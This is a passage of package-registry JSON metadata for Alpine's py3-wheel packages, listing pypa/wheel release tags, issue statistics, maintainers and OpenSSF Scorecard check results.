s/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:43.864Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.20","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":58,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2024-06-11T20:36:25.357Z","updated_at":"2024-06-11T20:36:25.357Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.20","url":"https://pkgs.alpinelinux.org/packages?branch=v3.20","ecosystem":"alpine","default":false,"packages_count":24162,"maintainers_count":405,"namespaces_count":2,"keywords_count":4251,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1476},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-06-07T11:51:39.915Z","updated_at":"2026-06-10T05:19:00.233Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/namespaces"}},{"id":6082692,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2022-11-09T22:20:22.000Z","latest_release_published_at":"2022-11-09T22:20:22.000Z","latest_release_number":"0.38.4-r0","last_synced_at":"2026-04-08T14:07:05.508Z","created_at":"2023-01-31T19:59:37.467Z","updated_at":"2026-04-08T14:07:05.508Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.17/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch 